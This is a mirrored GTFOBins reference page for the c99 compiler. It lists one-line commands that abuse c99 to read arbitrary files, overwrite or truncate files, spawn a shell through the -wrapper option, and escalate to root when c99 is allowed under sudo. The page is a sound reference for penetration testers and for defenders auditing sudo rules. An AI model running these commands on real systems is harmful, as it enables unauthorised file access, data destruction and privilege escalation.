This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-28 11:11:41 +01:00
Code
Issues
08dfd05aee
GTFOBins.github.io
/
_gtfobins
/
c99.md
Michalis Papadopoullos
7c9c505542
Add c89 and c99
2021-06-04 13:54:33 +02:00
327 B
Raw
Blame
History
functions
file-read
file-write
shell
sudo
code
LFILE=file_to_read c99 -x c -E "$LFILE"
code
LFILE=file_to_delete c99 -xc /dev/null -o $LFILE
code
c99 -wrapper /bin/sh,-s .
code
sudo c99 -wrapper /bin/sh,-s .